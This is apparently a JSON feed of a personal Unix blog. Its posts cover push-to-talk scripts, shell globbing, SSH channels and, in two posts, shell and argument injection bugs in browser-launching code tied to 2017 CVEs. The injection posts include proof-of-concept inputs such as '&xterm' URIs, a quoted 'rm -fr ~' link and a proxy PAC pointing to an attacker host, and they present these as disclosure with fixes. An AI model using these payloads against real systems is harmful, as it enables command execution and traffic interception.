{"version": "https://jsonfeed.org/version/1", "title": "/dev/posts/ - Tag index - unix", "home_page_url": "https://www.gabriel.urdhr.fr", "feed_url": "/tags/unix/feed.json", "items": [{"id": "http://www.gabriel.urdhr.fr/2020/04/11/push-to-talk-in-any-application/", "title": "Push-to-talk in any application", "url": "https://www.gabriel.urdhr.fr/2020/04/11/push-to-talk-in-any-application/", "date_published": "2020-04-11T00:00:00+02:00", "date_modified": "2020-04-11T00:00:00+02:00", "tags": ["computer", "unix", "gui", "pulseaudio", "x11", "covid-19"], "content_html": "

Some scripts I wrote to enable system-wide push-to-talk\n(for X11 and PulseAudio).\nSome people might find it for the ongoing lockdown.

\n

Some VoIP software have builtin support for push-to-talk.\nIn this mode, a global keyboard hotkey must be be held while speaking.\nThis is quite useful when in a noisy environment\nand/or with suboptimal mics.

\n

Some programs with support for this:

\n\n

Most programs don't support this.\nThis is especially true for browser-based VoIP software because as there is currently\nnot web API (AFAIU) ro register a global keyboard hotkey1.

\n

So I wrote two Python scripts for PulseAudio.

\n

Push-to-talk

\n

The first one\nimplements push-to-talk based on some keyboard key.\n(i.e. you have to hold the key while you are talking):

\n
pushtotalk --key \"Home\"\n
\n\n\n

It's intended for PulseAudio\nand X11 but it should be quite easy to adapt this to other sound and GUI systems.

\n

Toggle audio source

\n

The second one\njust toggles the mute state of the default PulseAudio source\nand provides a visual feedback (notification).\nIt's intended to be bound to some global keyboard hotkey.

\n

For example using a script\nbased on keybinder:

\n
keybinder \"<Control>m\" pulse-mute-toggle\n
\n\n\n

Simply toggling the audio source can be done with:

\n
pactl set-sink-mute @DEFAULT_SOURCE@ toggle\n
\n\n\n

Getting the notification of the state is important because otherwise you might\nend being in the wrong state.\nThere is no pactl get-sink-mute @DEFAULT_SOURCE@ command\nwhich is why it's not an absolutely straightforward shell script2.

\n
\n
\n
    \n
  1. \n

    This is why this feature is apparently available on the native Discord application\nbut not on the web one.\u00a0\u21a9

    \n
  2. \n
  3. \n

    It can be done by:

    \n
      \n
    • parsing the output of pacmd list-sources or similar (which is cumbersome);
    • \n
    • relying on the native protocol;
    • \n
    • use the PulseAudio D-Bus interface.
    • \n
    \n

    I decided to use the D-Bus interface\n(which is sadly not enabled by default).\u00a0\u21a9

    \n
  4. \n
\n
"}, {"id": "http://www.gabriel.urdhr.fr/2019/03/29/surprising-shell-pathname-expansion/", "title": "Surprising shell pathname expansion", "url": "https://www.gabriel.urdhr.fr/2019/03/29/surprising-shell-pathname-expansion/", "date_published": "2019-03-29T00:00:00+01:00", "date_modified": "2019-03-29T00:00:00+01:00", "tags": ["computer", "unix", "shell"], "content_html": "

I thought I was understanding pretty well how bash argument processing and\nvarious expansions is supposed to behave. Apparently, there are still\nsubtleties which tricks me, sometimes.

\n

Question: what is the (standard) output of the following shell command? \"\ud83e\udd14\"

\n
a='*' ; echo $a\n
\n\n\n

The answer is below this anti-spoiler protection.

\n


\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n

\n

Answer

\n

Here's the command again:

\n
a='*' ; echo $a\n
\n\n\n

I would have said that the answer was *, obviously.\nBut this is wrong.\nThe output is the list of files in the current directory.\n\"\ud83d\ude32\"

\n

The content of the a variable is * because the assignment is single-quoted.\nFor example, this shell command does output *:

\n
a='*' ; echo \"$a\"\n
\n\n\n

However, in echo $a, * is pathname-expanded into the list of files\nin the current directory.\nI would not have thought that pathname expansion would trigger in this case.

\n

Explanation

\n

This is indeed the behaviour specified for POSIX shell\nWord Expansions:

\n
\n

The order of word expansion shall be as follows:

\n
    \n
  1. \n

    Tilde expansion (see Tilde Expansion), parameter expansion\n (see Parameter Expansion), command substitution (see Command Substitution),\n and arithmetic expansion (see Arithmetic Expansion) shall be performed,\n beginning to end. See item 5 in Token Recognition.

    \n
  2. \n
  3. \n

    Field splitting (see Field Splitting) shall be performed on the portions\n of the fields generated by step 1, unless IFS is null.

    \n
  4. \n
  5. \n

    Pathname expansion (see Pathname Expansion) shall be performed,\n unless set -f is in effect.

    \n
  6. \n
  7. \n

    Quote removal (see Quote Removal) shall always be performed last.

    \n
  8. \n
\n
\n

Pathname expansions happens after variable expansion.\nI think I would have said it was done before variable expansion\nand command substitution.

\n

Edit: I think what I actually found surprising is that\npattern matching characters\ncoming from expansions are actually active\npattern matching characters (instead of counting as ordinary characters).

\n

About Parameter Expansion\nPOSIX mandates that double-quotes prevents pathanme expansions from happening\n(i.e. if there is no quoting pahtname expansion happens):

\n
\n

If a parameter expansion occurs inside double-quotes:\nPathname expansion shall not be performed on the results of the expansion.

\n
\n

Of course,\nsingle quotes prevents pathname expansion\nfrom happening\n(in addition to preventing variable expansion and otherthings from happening):

\n
\n

Enclosing characters in single-quotes ('') shall preserve the literal value\nof each character within the single-quotes. A single-quote cannot occur within\nsingle-quotes.

\n
\n

This is not super surprising if we think about, for example:

\n
# List all HTML files:\next=html ; echo *.$ext\n
\n\n\n

This works as well with pattern matching:

\n
ext=html\nfor a in \"$@\"; do\n  case \"$a\" in\n    *.$ext)\n        echo \"Interesting file: $a\"\n        ;;\n    *)\n      echo \"Boring file: $a\"\n      ;;\n  esac\ndone\n
\n\n\n

Command Substitution

\n

About\nCommand Substitution\nPOSIX mandates:

\n
\n

If a command substitution occurs inside double-quotes, field splitting\nand pathname expansion shall not be performed on the results of the substitution.

\n
\n

Which means that this command\noutputs the list of file in the current directory as well:

\n
echo $(echo '*')\n
\n\n\n

Context

\n

It took me some time to understand what\nwas happening when debugging a slightly more convoluted example\nfrom YunoHost:

\n
ynh_mysql_execute_as_root \"GRANT ALL PRIVILEGES ON *.* TO '$db_admin_user'@'localhost' IDENTIFIED BY '$db_admin_pwd' WITH GRANT OPTION;\n  FLUSH PRIVILEGES;\" mysql\n
\n\n\n

Inside ynh_mysql_execute_as_root, the parameters are assigned to local\nvariables with this (bash) code:

\n
arguments[$i]=\"${arguments[$i]//\\\"/\\\\\\\"}\"\narguments[$i]=\"${arguments[$i]//$/\\\\\\$}\"\neval ${option_var}+=\\\"${arguments[$i]}\\\"\n
\n\n\n

This code is obviously vulnerable to shell command code injection\nin the eval line\nthrough backticks and backslashes.\nWhat surprised me\nis that pathname expansion was happening in *.*.\nThis is because ${arguments[$i]} is not double-quoted in the last line\nand this is completely unrelated to eval.

\n

For reference, the correct and simple way to proceed,\nwhich avoids unwanted command injection and pathname expansion is:

\n
eval ${option_var}+='\"${arguments[$i]}\"'\n
\n\n\n

Conclusion

\n

Unquoted variable expansion and command substitutions\nare trickier than I thought.

\n

When variable expansion or command substitution happens unquoted,\npathname expansion might possibly happen. I think this might have security\nimplications for some shell scripts out there.

"}, {"id": "http://www.gabriel.urdhr.fr/2018/05/30/more-browser-injections/", "title": "More example of argument and shell command injections in browser invocation", "url": "https://www.gabriel.urdhr.fr/2018/05/30/more-browser-injections/", "date_published": "2018-05-30T00:00:00+02:00", "date_modified": "2018-05-30T00:00:00+02:00", "tags": ["computer", "unix", "debian", "security", "shell"], "content_html": "

In the previous episode, I talked about\nsome argument and shell command injections vulnerabilities\nthrough URIs passed to browsers.\nHere I'm checkig some other CVEs which were registered at the same time.

\n

ScummVM (CVE-2017-17528)

\n

In ScummVM, we have:

\n
bool OSystem_POSIX::openUrl(const Common::String &url) {\n    // inspired by Qt's \"qdesktopservices_x11.cpp\"\n\n    // try \"standards\"\n    if (launchBrowser(\"xdg-open\", url))\n        return true;\n    if (launchBrowser(getenv(\"DEFAULT_BROWSER\"), url))\n        return true;\n    if (launchBrowser(getenv(\"BROWSER\"), url))\n        return true;\n\n    // try desktop environment specific tools\n    if (launchBrowser(\"gnome-open\", url)) // gnome\n        return true;\n    if (launchBrowser(\"kfmclient openURL\", url)) // kde\n        return true;\n    if (launchBrowser(\"exo-open\", url)) // xfce\n        return true;\n\n    // try browser names\n    if (launchBrowser(\"firefox\", url))\n        return true;\n    if (launchBrowser(\"mozilla\", url))\n        return true;\n    if (launchBrowser(\"netscape\", url))\n        return true;\n    if (launchBrowser(\"opera\", url))\n        return true;\n    if (launchBrowser(\"chromium-browser\", url))\n        return true;\n    if (launchBrowser(\"google-chrome\", url))\n        return true;\n\n    warning(\"openUrl() (POSIX) failed to open URL\");\n    return false;\n}\n\nbool OSystem_POSIX::launchBrowser(const Common::String& client, const Common::String &url) {\n    // FIXME: system's input must be heavily escaped\n    // well, when url's specified by user\n    // it's OK now (urls are hardcoded somewhere in GUI)\n    Common::String cmd = client + \" \" + url;\n    return (system(cmd.c_str()) != -1);\n}\n
\n\n\n

OSystem_POSIX::openUrl() calls system() without quoting the URI.\nThis is clearly vulnerable to shell command injection but,\nas stated in the comment, it's currently not a problem in pratice\nbecause the only calls are of openUrl() are:

\n
g_system->openUrl(\"http://www.amazon.de/EuroVideo-Bildprogramm-GmbH-Full-Pipe/dp/B003TO51YE/ref=sr_1_1?ie=UTF8&s=videogames&qid=1279207213&sr=8-1\");\ng_system->openUrl(\"http://pipestudio.ru/fullpipe/\");\ng_system->openUrl(\"http://scummvm.org/\")\ng_system->openUrl(getUrl())\n
\n\n\n

with:

\n
Common::String StorageWizardDialog::getUrl() const {\n    Common::String url = \"https://www.scummvm.org/c/\";\n    switch (_storageId) {\n    case Cloud::kStorageDropboxId:\n        url += \"db\";\n        break;\n    case Cloud::kStorageOneDriveId:\n        url += \"od\";\n        break;\n    case Cloud::kStorageGoogleDriveId:\n        url += \"gd\";\n        break;\n    case Cloud::kStorageBoxId:\n        url += \"bx\";\n        break;\n    }\n\n    if (Cloud::CloudManager::couldUseLocalServer())\n        url += \"s\";\n\n    return url;\n}\n
\n\n\n

The only case where shell commands are actually injected is the first one where\nit does something like:

\n
xdg-open https://www.amazon.de/EuroVideo-Bildprogramm-GmbH-Full-Pipe/dp/B003TO51YE/ref=sr_1_1?ie=UTF8&s=videogames&qid=1279207213&sr=8-1\n
\n\n\n

which make these assignments in subshells (which is quite harmless):

\n
ie=UTF8\ns=videogames\nqid=1279207213\nsr=8-1\n
\n\n\n

References:

\n\n

GNU GLOBAL (CVE-2017-17531)

\n

In GNU GLOBAL, it looked like this:

\n
snprintf(com, sizeof(com), \"%s \\\"%s\\\"\", browser, url);\nsystem(com);\n
\n\n\n

Here, the URI is double-quoted but this is not enough:

\n\n

For v6.6.1,\neach argument is quoted with quote_shell() in order to properly escape\nthe shell metacharacters:

\n
strbuf_puts(sb, quote_shell(browser));\nstrbuf_putc(sb, ' ');\nstrbuf_puts(sb, quote_shell(url));\nsystem(strbuf_value(sb));\n
\n\n\n

In v6.6.2\nthis was changed to using execvp():

\n
argv[0] = (char *)browser;\nargv[1] = (char *)url;\nargv[2] = NULL;\nexecvp(browser, argv);\n
\n\n\n

Using execvp() is much better than relying on system() and using\nan error-prone escaping of the URI to prevent injections.

\n

References:

\n\n

gjots2 (CVE-2017-17535)

\n

In gjots2, the vulnerable code is:

\n
def _run_browser_on(self, url):\n  if self.debug:\n    print inspect.getframeinfo(inspect.currentframe())[2]\n  browser = self._get_browser()\n  if browser:\n    os.system(browser + \" '\" + url + \"' &\")\n  else:\n    self.msg(\"Can't run a browser\")\n  return 0\n
\n\n\n

The URI is single-quoted.

\n

We can use single-quotes in the URI to injection commands.\nFor example, opening link in gjots2 spawns a xterm:

\n
\nhttp://www.example.com/'&xterm'\n
\n\n

References:

\n\n

ABiWord (CVE-2017-17529)

\n

In AbiWord, we have:

\n
GError *err = NULL;\n#if GTK_CHECK_VERSION(2,14,0)\nif(!gtk_show_uri (NULL, url, GDK_CURRENT_TIME, &err)) {\n  fallback_open_uri(url, &err);\n}\nreturn err;\n#elif defined(WITH_GNOMEVFS)\ngnome_vfs_url_show (url);\nreturn err;\n#else\nfallback_open_uri(url, &err);\nreturn err;\n#endif\n
\n\n\n

The problematic code is supposed to be in fallback_open_uri():

\n
gint    argc;\ngchar **argv = NULL;\nchar   *cmd_line = g_strconcat (browser, \" %1\", NULL);\n\nif (g_shell_parse_argv (cmd_line, &argc, &argv, err)) {\n  /* check for '%1' in an argument and substitute the url\n   * otherwise append it */\n  gint i;\n  char *tmp;\n\n  for (i = 1 ; i < argc ; i++)\n    if (NULL != (tmp = strstr (argv[i], \"%1\"))) {\n      *tmp = '\\0';\n      tmp = g_strconcat (argv[i],\n        (clean_url != NULL) ? (char const *)clean_url : url,\n        tmp+2, NULL);\n      g_free (argv[i]);\n      argv[i] = tmp;\n      break;\n    }\n\n  /* there was actually a %1, drop the one we added */\n  if (i != argc-1) {\n    g_free (argv[argc-1]);\n    argv[argc-1] = NULL;\n  }\n  g_spawn_async (NULL, argv, NULL, G_SPAWN_SEARCH_PATH,\n    NULL, NULL, NULL, err);\n  g_strfreev (argv);\n}\ng_free (cmd_line);\n
\n\n\n

This code seems correct with respect to injection through the URI:\nthe URI string cannot be expanded into multiple arguments\n(no word splitting) and is not passed to system().

\n

I think this code is safe.\nI could not trigger any injection through AbiWord.\nI tested gtk_show_uri(), fallback_open_uri() and gnome_vfs_url_show()\nin isolation and I could not trigger any injection through the URI.

\n

References:

\n\n

FontForge (CVE-2017-17521)

\n

In FontForge, the help() function is clearly vulnerable. The URI is\ndouble-quoted:

\n
temp = malloc(strlen(browser) + strlen(fullspec) + 20);\nsprintf( temp, strcmp(browser,\"kfmclient openURL\")==0 ? \"%s \\\"%s\\\" &\" : \"\\\"%s\\\" \\\"%s\\\" &\", browser, fullspec );\nsystem(temp);\n
\n\n\n

In practice, it is always used with path where this is safe to do.

\n

References:

\n\n

Ocaml Batteries Included (CVE-2017-17519)

\n

The code is:

\n
let (browser: (_, _, _) format) = \"@BROWSER_COMMAND@ %s\";;\n\n(**The default function to open a www browser.*)\nlet default_browse s =\n  let command = Printf.sprintf browser s in\n  Sys.command command\nlet current_browse = ref default_browse\n\nlet browse s = !current_browse s\n
\n\n\n

system() is called without any quotation of the URI.

\n

Example:

\n
open Batteries;;\nopen BatteriesConfig;;\nbrowse \"http://www.example.com/&xterm\";;\n
\n\n\n

Compiled with:

\n
ocamlfind ocamlc -package batteries -linkpkg browser2.ml -o browser2\n
\n\n\n

References:

\n\n

Python 3 (CVE-2017-17522)

\n

The code is:

\n
class GenericBrowser(BaseBrowser):\n    \"\"\"Class for all browsers started with a command\n       and without remote functionality.\"\"\"\n\n    def __init__(self, name):\n        if isinstance(name, str):\n            self.name = name\n            self.args = [\"%s\"]\n        else:\n            # name should be a list with arguments\n            self.name = name[0]\n            self.args = name[1:]\n        self.basename = os.path.basename(self.name)\n\n    def open(self, url, new=0, autoraise=True):\n        cmdline = [self.name] + [arg.replace(\"%s\", url)\n                                 for arg in self.args]\n        try:\n            if sys.platform[:3] == 'win':\n                p = subprocess.Popen(cmdline)\n            else:\n                p = subprocess.Popen(cmdline, close_fds=True)\n            return not p.wait()\n        except OSError:\n            return False\n
\n\n\n

A note in the CVE says:

\n
\n

NOTE: a software maintainer indicates that exploitation is impossible\nbecause the code relies on subprocess.Popen and the default shell=False\nsetting.

\n
\n

Popen is indeed passed an array of arguments which are passed to execve().\nThere is not argument splitting and no shell is involved\nso this code is not vulnerable to URI-based injections.

\n

References:

\n\n

TeX (CVE-2017-17513)

\n

I have no idea what mtxrun is supposed to do but it looks\nlike it's vulnerable because the URI is not quoted:

\n
local launchers={\n  windows=\"start %s\",\n  macosx=\"open %s\",\n  unix=\"$BROWSER %s &> /dev/null &\",\n}\nfunction os.launch(str)\n  execute(format(launchers[os.name] or launchers.unix,str))\nend\n
\n\n\n

References:

\n\n

Summary

\n"}, {"id": "http://www.gabriel.urdhr.fr/2018/05/28/browser-injections/", "title": "Argument and shell command injections in browser invocation", "url": "https://www.gabriel.urdhr.fr/2018/05/28/browser-injections/", "date_published": "2018-05-28T00:00:00+02:00", "date_modified": "2018-05-28T00:00:00+02:00", "tags": ["computer", "unix", "debian", "security", "shell"], "content_html": "

While reading the source of sensible-browser in order to understand how\nit was choosing which browser to call (and how I could tweak this choice),\nI found an argument injection vulnerability\nwhen handling the BROWSER environment variable.\nThis lead me (and others) to a a few other argument and shell command injection\nvulnerabilities in BROWSER processing and browser invocation in general.

\n

Overview:

\n\n

Table of Content

\n
\n\n
\n

The BROWSER variable environment

\n

The BROWSER environment variable is used as a way to specify the user's\npreferred browser. The specific handling of this variable is not consistent\nacross programs:

\n\n

As was already noted in 2001,\nnaively implementing support for this environment variable\n(and especially the %s expansion) can lead to injection vulnerabilities:

\n
\n

Eric Raymond has proposed the BROWSER convention for Unix-like systems,\nwhich lets users specify their browser preferences and lets developers easily\ninvoke those browsers. In general, this is a great idea.\nUnfortunately, as specified it has horrendous security flaws;\ndocuments containing hypertext links like ; /bin/rm -fr ~\nwill erase all of a user's files when the user selects it!

\n
\n

In contrast, the .desktop file specification\nclearly specifies\nhow argument expansion and word splitting is supposed to happen\nwhen processing .desktop files\nin a way which is not vulnerable to injection attacks.

\n

Argument injection in sensible-browser (CVE-2017-17512)

\n

The vulnerability

\n

sensible-browser is a simple program which tries to guess a suitable browser\nto open a given URI. You call it like:

\n
sensible-browser http://www.example.com/\n
\n\n\n

and it ultimately calls something like:

\n
firefox http://www.example.com/\n
\n\n\n

The actual browser called depends on the desktop environment (and its\nconfiguration) and some environment variable.

\n

While trying to understand how I could configure the browser to use,\nI found this snippet:

\n
if test -n \"$BROWSER\"; then\n  OLDIFS=\"$IFS\"\n  IFS=:\n  for i in $BROWSER; do\n      case \"$i\" in\n          (*%s*)\n          :\n          ;;\n          (*)\n          i=\"$i %s\"\n          ;;\n      esac\n      IFS=\"$OLDIFS\"\n      cmd=$(printf \"$i\\n\" \"$URL\")\n      $cmd && exit 0\n  done\nfi\n
\n\n\n

The idea is that when the BROWSER environment variable is set, it is taken\nas a list of browsers which are tried in turn. Morever if %s in present in\none of the browser strings, it is replaced with the URI.

\n

The problem is that if $URL contains some spaces (or other IFS characters)\nthe URL will be split in several arguments.

\n

The interesting lines are:

\n
cmd=$(printf \"$i\\n\" \"$URL\")\n$cmd && exit 0\n
\n\n\n

An attacker could inject additional arguments in the browser call.

\n

For example, this command opens a Chromium window in incognito mode:

\n
BROWSER=chromium sensible-browser \"http://www.example.com/ --incognito\"\n
\n\n\n

One could argue that this URI is invalid and that this is not a problem.\nHowever, if the caller of sensible-browser does not properly validate the URI,\nan attacker could craft a broken URI which when called\nwill add extra arguments when calling the browser.

\n

A suitable caller

\n

Emacs might call sensible-browser with an invalid URI.

\n

First, we configure it to use open links with sensible-browser:

\n
(setq browse-url-browser-function (quote browse-url-generic))\n(setq browse-url-generic-program \"sensible-browser\")\n
\n\n\n

Now, an org-mode file like this one will open Chromium in incognito mode:

\n
[[http://www.example.com/ --incognito][test]]\n
\n\n\n

Note: I was able to trigger this with org-mode 9.1.2 as shipped in the\nin Debian elpa-org package. This does not happen with org-mode 8.2.10\nwhich was shipped in the emacs25 package.

\n

MITMing the browser

\n

This particular example is not very dangerous and the injection is easy\nto notice. However, other injected arguments can be more harmful and more\ninsiduous.

\n

Clicking on the link of this org file launches Chromium with an\nalternative PAC file:

\n
[[http://www.example.com/ --proxy-pac-file=http://dangerous.example.com/proxy.pac][test]]\n
\n\n\n

Nothing is notifying the user that an alternative PAC file is in use.

\n

An attacker could use this type of URI to forward all the browser traffic\nto a server under his control and effectively MITM all the browser traffic:

\n
function FindProxyForURL(url, host)\n{\n  return \"SOCKS mitm.example.com:9080\";\n}\n
\n\n\n

Of course, for HTTPS websites, the attacker still cannot MITM the user unless\nthe users accepts a bogus certificate.

\n

Alternatively, you can simply\npass a --proxy-server argument\nto set a proxy withtout using a PAC file.

\n

Fixing the vulnerability

\n

A possible fix would be for sensible-browser to actually check that the\nURL parameter does not contain any IFS character.

\n

The fix currently deployed is to remove support for %s-expansion altogether\n(as well as support for multiple browsers):

\n
if test -n \"$BROWSER\"; then\n    ${BROWSER} \"$@\"\n    ret=\"$?\"\n    if [ \"$ret\" -ne 126 ] && [ \"$ret\" -ne 127 ]; then\n        exit \"$ret\"\n    fi\nfi\n
\n\n\n

References

\n\n

Argument injection in xdg-open (CVE-2017-18266)

\n

xdg-open is similar to sensible-browser. It opens files or URIs with some\nprograms depending on the desktop-environment.\nIn some cases it fall backs to using BROWSER:

\n
open_envvar()\n{\n    local oldifs=\"$IFS\"\n    local browser browser_with_arg\n\n    IFS=\":\"\n    for browser in $BROWSER; do\n        IFS=\"$oldifs\"\n\n        if [ -z \"$browser\" ]; then\n            continue\n        fi\n\n        if echo \"$browser\" | grep -q %s; then\n            $(printf \"$browser\" \"$1\")\n        else\n            $browser \"$1\"\n        fi\n\n        if [ $? -eq 0 ]; then\n            exit_success\n        fi\n    done\n}\n
\n\n\n

The interesting bit is:

\n
$(printf \"$browser\" \"$1\")\n
\n\n\n

This is vulnerable to argument injection like the sensible-browser case.

\n

This bug was reported in the xdg-utils bugtracker as bug\n#103807\nand I proposed this very simple fix:

\n
if echo \"$browser\" | grep -q %s; then\n  # Avoid argument injection.\n  # See https://bugs.freedesktop.org/show_bug.cgi?id=103807\n  # URIs don't have IFS characters spaces anyway.\n  has_single_argument $1 && $(printf \"$browser\" \"$1\")\nelse\n  $browser \"$1\"\nfi\n
\n\n\n

where has_single_argument() is defined has:

\n
has_single_argument()\n{\n  test $# = 1\n}\n
\n\n\n

Another (better) solution\ncurrently shipped in Debian is:

\n
url=\"$1\"\nif echo \"$browser\" | grep -q %s; then\n  shift $#\n  for arg in $browser; do\n    set -- \"$@\" \"$(printf -- \"$arg\" \"$url\")\"\n  done\n  \"$@\"\nelse\n  $browser \"$url\"\nfi\n
\n\n\n

By the way, I learned this usage of set.

\n

References:

\n\n

Shell command injection in lilypond (CVE-2017-17523, CVE-2018-10992)

\n

I started checking if the same vulnerability could be found in other programs\nusing Debian code search.\nThis led me to lilypond-invoke-editor.

\n

This is an helper script expected to be set as a URI handler in a PDF viewer.\nIt handles some special lilypond URIs\n(textedit://FILE:LINE:CHAR:COLUMN).\nIt forwards other URIs to some real browser using:

\n
(define (run-browser uri)\n  (system\n   (if (getenv \"BROWSER\")\n       (format #f \"~a ~a\" (getenv \"BROWSER\") uri)\n       (format #f \"firefox -remote 'OpenURL(~a,new-tab)'\" uri))))\n
\n\n\n

The scheme system function is equivalent to the C system():\nit passes the argument to the shell (with sh -c).

\n

This case is worse than the previous ones.\nNot only can an attacker inject extra arguments\n(provided the caller can pass IFS chracters)\nbut it's possible to inject arbitrary shell commands:

\n
BROWSER=\"chromium\" lilypond-invoke-editor \"http://www.example.com/ & xterm\"\n
\n\n\n

It even works with valid URIs:

\n
BROWSER=\"chromium\" lilypond-invoke-editor \"http://www.example.com/&xterm\"\n
\n\n\n

We can generate a simple PDF file which contains a link\nwhich calls xterm through lilypond-invoke-editor:

\n
BROWSER=\"lilypond-invoke-editor\" mupdf xterm-inject.pdf\n
\n\n\n

The current fix in Debian is:

\n
(define (run-browser uri)\n  (if (getenv \"BROWSER\")\n        (system*\n          (getenv \"BROWSER\")\n          uri)\n          (system*\n            \"firefox\"\n            \"-remote\"\n            (format #f \"OpenUrl(~a,new-tab)\" uri))))\n
\n\n\n

system* is similar to posix_spawnp(): it takes a list of arguments\nand does something like fork(), execvp() and wait()\n(without going through a shell interpreter).

\n

References\u00a0:

\n\n

Similar vulnerabilities

\n

Someone apparently took over the job of finding similar issues in other packages\nbecause a whole range of related CVE has been registered at the same time\n(some of them are disputed, not all of them are valid):

\n\n

I'll look at some of them in a next episode.

\n

Analysis

\n

These vulnerabilities can be split in two classes.

\n

Argument injection

\n

Argument injection can happen when IFS present in the URI are expanded\ninto multiple arguments.\nThis usually happen because of unquoted shell expansion\nof non-validated strings:

\n
my-command $some_untrusted_input\n
\n\n\n

IFS characters are not in valid URIs so if the URI\nwas already validated somehow in the caller this is not be an issue.\nAs we have seen, some caller might not properly validate the URI string.

\n

Shell command injection

\n

Shell command injection can happen when shell metacharacters\n($, <, >, ;, &, &&, |, ||, etc.) found in the URI\nare passed without proper escaping to the shell interpreter:

\n\n

A typical example would be be (in Python):

\n
os.system(\"my-command \" + url)\n
\n\n\n

Or in shell:

\n
eval my-command \"$url\"\n
\n\n\n

In some cases, some escaping is done such as\nin gjots2:

\n
os.system(browser + \" '\" + url + \"' &\")\n
\n\n\n

This simple quoting is not enough however because you can escape out of it\nusing single-quotes in the untrusted input. If you want to to that, you need\nto properly escape\nquotes and backslashes in the input as well:

\n
os.system(\"{} {} \".format(browser, shlex.quote(url)))\n
\n\n\n

Using system() is often a bad idea and you'd better use:

\n\n

For example, the previous example could be rewritten as:

\n
os.spawnvp(os.P_WAIT, browser, [browser, url])\n
\n\n\n

Some of the shell metacharacters (&, ;, etc.) can be present in valid URIs\n(eg. http://www.example.com/&xterm)\nso even a proper URI validation does not protect against those attacks.

\n

Related

\n"}, {"id": "http://www.gabriel.urdhr.fr/2017/08/02/foo-over-ssh/", "title": "Foo over SSH", "url": "https://www.gabriel.urdhr.fr/2017/08/02/foo-over-ssh/", "date_published": "2017-08-02T00:00:00+02:00", "date_modified": "2017-08-02T00:00:00+02:00", "tags": ["computer", "network", "ssh", "unix"], "content_html": "

A comparison of the different solutions for using SSH2 as a secured\ntransport for protocols/services/applications.

\n

Table of Content

\n
\n\n
\n

SSH-2 Protocol

\n

Overview

\n

The SSH-2 protocol uses its\nTransport Layer Protocol to provide\nencryption, confidentiality, server authentication and integrity over a\n(potentially) unsafe reliable bidirectional data stream (usually TCP port 22):

\n

The transport layer transports SSH packets.\nIt handles:

\n\n

Each packet starts with a message number and can belong to:

\n\n

Typical protocol stack (assuming TCP/IP):

\n
\n            [Session | Forwarding]\n[SSH Authn. |SSH Connection      ]\n[SSH Transport                   ]\n[TCP                             ]\n[IP                              ]\n
\n\n

Connection Protocol

\n

The Connection Protocol is used\nto manage channels\nand transfers data over them. Each channel is (roughly) a bidirectionnal\ndata stream:

\n\n

Multiple channels can be multiplexed over the same SSH connection:

\n
\nC \u2192 S CHANNEL_DATA(1, \"whoami\\n\")\nC \u2192 S CHANNEL_DATA(2, \"GET / HTTP/1.1\\r\\nHost: foo.example.com\\r\\n\\r\\n\")\nC \u2190 S CHANNEL_DATA(5, \"root\\n\")\nC \u2190 S CHANNEL_DATA(6, \"HTTP/1.1 200 OK\\r\\nContent-Type:text/plain\\r\\n\")\nC \u2190 S CHANNEL_DATA(6, \"Content-Length: 11\\r\\n\\r\\nHello World!\")\n
\n\n

Channels

\n

Session Channel

\n

A session channel is used to start:

\n\n

For session channels, the protocol has support for setting environment variables,\nallocating a server-side TTY, enabling X11 forwarding, notifying of the terminal\nsize modification (see SIGWINCH), sending signals, reporting the exit\nstatus or exit signal.

\n
\nC \u2192 S CHANNEL_OPEN(\"session\", 2, \u2026)\nC \u2190 S CHANNEL_OPEN_CONFIRMATION(3, 6)\nC \u2192 S CHANNEL_REQUEST(6, \"pty-req\", TRUE, \"xterm\", 80, 120, \u2026)\nC \u2190 S CHANNEL_SUCCESS(3)\nC \u2192 S CHANNEL_REQUEST(6, \"env\", TRUE, \"LANG\", \"fr_FR.utf8\")\nC \u2190 S CHANNEL_SUCCESS(3)\nC \u2192 S CHANNEL_REQUEST(6, \"exec\", TRUE, \"ls /usr/\")\nC \u2190 S CHANNEL_SUCCESS(3)\nC \u2190 S CHANNEL_DATA(3, \"bin\\ngames\\ninclude\\nlib\\nlocal\\sbin\\nshare\\nsrc\\n\")\nC \u2190 S CHANNEL_EOF(3)\nC \u2190 S CHANNEL_REQUEST(3, \"exit-status\", FALSE, 0)\nC \u2190 S CHANNEL_CLOSE(3)\nC \u2192 S CHANNEL_CLOSE(6)\n
\n\n

Shell

\n

Shell session channels are used for interactive session are not really\nuseful for protocol encapsulation.

\n

Commands

\n

In SSH, a command is a single string.\nThis is not an array of strings (argv).\nOn a UNIX-ish system, the command is usually expected to be called by the user's\nshell (\"$SHELL\" -c \"$command\"): variable expansions, globbing are applied\nby the server-side shell.

\n
ssh foo.example.com 'ls *'\nssh foo.example.com 'echo $LANG'\nssh foo.example.com 'while true; do uptime ; sleep 60 ; done'\n
\n\n\n

Subsystems

\n

A subsystem is a \u201cwell-known\u201d service running on top of SSH. It is\nidentified by a string which makes it system independent: it does not\ndepend on the user/system shell, environment (PATH), etc.

\n

With the OpenSSH client, a subsystem can be invoked with\nssh -S $subsystem_name.

\n

Subsystem names come in\ntwo forms:

\n\n

Well-known subsystem names include:

\n\n

When using a subsystem:

\n\n

With the OpenSSH server, a command can be associated with a given\nsubsystem name with a configuration entry such as:

\n
Subsystem sftp /usr/lib/openssh/sftp-server\n
\n\n\n

The command is run under the identity of the user with its own shell\n(\"$SHELL\" -c \"$command\").

\n

If you want to connect to a socket you might use:

\n
Subsystem http socat STDIO TCP:localhost:80\nSubsystem hello@example.com socat STDIO UNIX:/var/run/hello\n
\n\n\n

It is possible to use exec to avoid keeping a shell process6:

\n
Subsystem http exec socat STDIO TCP:localhost:80\nSubsystem hello@example.com exec socat STDIO UNIX:/var/run/hello\n
\n\n\n

This works but OpenSSH complains because it checks for the existence of an\nexec executable file.

\n

Forwarding channels

\n

TCP/IP Forwarding

\n

The SSH has support for forwarding (either incoming or outgoing)\nTCP connections.

\n

Local forwarding is used to forward a local connection (or any\nother local stream) to a remote TCP endpoint. A channel of type\nforwarded-tcpip is opened to initiate a TCP connection on the remote\nside. This is used by ssh -L, ssh -W and ssh -D

\n
\nC \u2192 S CHANNEL_OPEN(\"direct-tcpip\", chan, \u2026, \"foo.example.com\", 9000, \"\", 0);\nC \u2190 S CHANNEL_OPEN_CONFIRMATION(chan, chan2, \u2026)\nC \u2192 S CHANNEL_DATA(chan2, \"aaa\")\n
\n\n

